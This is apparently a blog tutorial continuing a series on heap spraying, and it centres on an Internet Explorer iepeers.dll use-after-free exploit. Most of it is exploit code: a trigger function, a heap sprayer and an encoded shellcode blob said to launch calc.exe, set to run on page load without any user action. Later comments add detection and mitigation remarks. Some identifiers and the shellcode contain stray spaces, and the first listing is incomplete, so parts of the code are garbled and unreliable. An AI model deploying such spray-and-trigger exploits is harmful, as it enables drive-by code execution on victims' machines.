• Heap Spray --- Slipping CPU to our pocket--continued

    The exploit above takes nearly a minute to spray the heap. Watch the memory and CPU performance graphs in Task Manager while it runs
    to better understand the heap spray technique. The same sustained climb in memory and CPU is what makes a spray observable to a defender.


    2. IE iepeers:

    The following code can trigger the vulnerability in iepeers.dll in Internet Explorer:


    <html><body>
    <button id='butid' onclick='trigger();' style='display:none'></button>

    <!--place the sprayer here---->

    // Spray step: fills a 500-entry array, storing a new nopsled+shellcode
    // concatenation in each slot. nopsled and shellcode are not defined in
    // this listing; they come from the sprayer the placeholder above stands for.
    spray=new Array();var i=0;
    for(i=0;i<500;i++){spray[i]=nopsled+shellcode;}
    /**
     * Sets up the DOM state that, according to the surrounding text, triggers
     * the iepeers.dll vulnerability in Internet Explorer. Takes no arguments
     * and returns nothing.
     *
     * NOTE(review): for detection, the distinctive part is likely the
     * addBehavior('#default#userData') call followed by setAttribute with an
     * object (not a string) as the value. The durable mitigation is the
     * vendor update for iepeers.dll or retiring the affected browser --
     * confirm affected versions against the vendor advisory.
     */
    function trigger(){
    // Create a new <body> element and attach the '#default#userData' behavior to it.
    var varbdy = document.createElement('body');
    varbdy.addBehavior('#default#userData');
    // Append the element directly to the document node.
    document.appendChild(varbdy);
    // Any exception raised by the repeated calls is swallowed by the empty catch.
    try {
    // iter is not declared with var, so it becomes an implicit global.
    for (iter=0; iter<10; iter++) {
    // The window object, not a string, is passed as the attribute value.
    varbdy.setAttribute('s',window);
    }
    } catch(e){ }
    // Appends an empty string to window.status; the page does not explain why.
    window.status+='';
    }
    // Calls the hidden button's onclick handler directly, so trigger() runs as
    // soon as this line executes, with no click from the user.
    document.getElementById('butid').onclick();
    </script></body></html>



    For the vulnerability above, the following is the heap spray exploit with a calc.exe shellcode:

    <!----------------------iepeers.htm------------------>
    <html><body>
    <button id='butid' onclick='trigger();' style='display:none'></button>
    <script language='javascript'>
    /*----------heap sprayer------------------*/
    var shellcode=unescape('%u9090%u9090%u9090%u9090%uceba %u11fa%u291f%ub1c9%udb33%ud9ce%u2474%u5ef4%u5631%u 030e%u0e56%u0883%uf3fe%u68ea%u7a17%u9014%u1de8%u75 9c%u0fd9%ufefa%u8048%u5288%u6b61%u46dc%u19f2%u69c9 %u94b3%u442f%u1944%u0af0%u3b86%u508c%u9bdb%u9bad%u dd2e%uc1ea%u8fc1%u8ea3%u2070%ud2c7%u4148%u5907%u39 f0%u9d22%uf385%ucd2d%u8f36%uf566%ud73d%u0456%u0b91 %u4faa%uf89e%u4e58%u3176%u61a0%u9eb6%u4e9f%ude3b%u 68d8%u95a4%u8b12%uae59%uf6e0%u3b85%u50f5%u9b4d%u61 dd%u7a82%u6d95%u086f%u71f1%udd6e%u8d89%ue0fb%u045d %uc6bf%u4d79%u661b%u2bdb%u97ca%u933b%u3db3%u3137%u 44a7%u5f1a%uc436%u2620%ud638%u082a%ue751%uc7a1%uf8 26%uac63%u1ac9%ud8a6%u8361%u6123%u34ec%ua59e%ub709 %u552b%ua7ee%u5059%u6faa%u28b1%u05a3%u9fb5%u0fc4%u 7ed6%ud357%ue537%u76df%u4148');
    // Heap-spray setup: builds one large filler string, then stores 500
    // filler+shellcode concatenations in an array. Apart from i, every name
    // here is assigned without var and so becomes an implicit global.
    //
    // NOTE(review): for defenders, a loop that stores hundreds of large strings
    // built from unescape('%u....') data is a common heuristic for script-level
    // spray detection, and it typically shows up as a sudden climb in the
    // browser's memory use. DEP and ASLR on a patched, supported browser are
    // the mitigations to rely on rather than signature matching alone.

    // Seed: the two UTF-16 units 0x0D0D 0x0D0D.
    bigblock=unescape("%u0D0D%u0D0D");
    // headersize is a fixed 20; the page does not explain the constant.
    headersize=20;shellcodesize=headersize+shellcode.l ength;
    // Double the seed until it is at least shellcodesize characters long.
    while(bigblock.length<shellcodesize){bigblock+=big block;}
    // heapshell: first shellcodesize characters of the filler;
    // nopsled: whatever part of the filler remains beyond that length.
    heapshell=bigblock.substring(0,shellcodesize);
    nopsled=bigblock.substring(0,bigblock.length-shellcodesize);
    // Grow nopsled (itself twice plus heapshell per pass) until
    // nopsled.length + shellcodesize reaches 0x25000 characters.
    while(nopsled.length+shellcodesize<0x25000){nopsle d=nopsled+nopsled+heapshell}

    // Each of the 500 iterations stores a new nopsled+shellcode concatenation.
    spray=new Array();var i=0;
    for(i=0;i<500;i++){spray[i]=nopsled+shellcode;}
    /*--------------spray code end---------------------*/

    /**
     * Performs the DOM calls that the article says trigger the iepeers.dll
     * vulnerability in Internet Explorer. No parameters, no return value.
     *
     * NOTE(review): the recognisable sequence for detection is likely
     * addBehavior('#default#userData') followed by setAttribute with an object
     * value. Mitigation is the vendor update for iepeers.dll or retiring the
     * affected browser -- confirm affected versions against the vendor advisory.
     */
    function trigger(){
    // New <body> element with the '#default#userData' behavior attached.
    var varbdy = document.createElement('body');
    varbdy.addBehavior('#default#userData');
    // The element is appended directly to the document node.
    document.appendChild(varbdy);
    // The empty catch discards any exception raised inside the loop.
    try {
    // iter has no var declaration, so it is an implicit global.
    for (iter=0; iter<10; iter++) {
    // Attribute 's' is set ten times, each time to the window object itself.
    varbdy.setAttribute('s',window);
    }
    } catch(e){ }
    // Appends an empty string to window.status; the purpose is not stated on the page.
    window.status+='';
    }
    // The hidden button's onclick handler is called directly, so trigger()
    // runs without any user interaction once the script reaches this line.
    document.getElementById('butid').onclick();
    </script></body></html>
    <!----------------------iepeers.htm------------------>


    The spray area for the iepeers exploit on IE6 is small, so the exploit runs considerably faster.


    The story doesn't end here; keep studying to build more expertise in code execution and the heap spray technique..."vinnu"
    This article was originally published in blog: Heap Spray --- Slipping CPU to our pocket--continued started by prashant_uniyal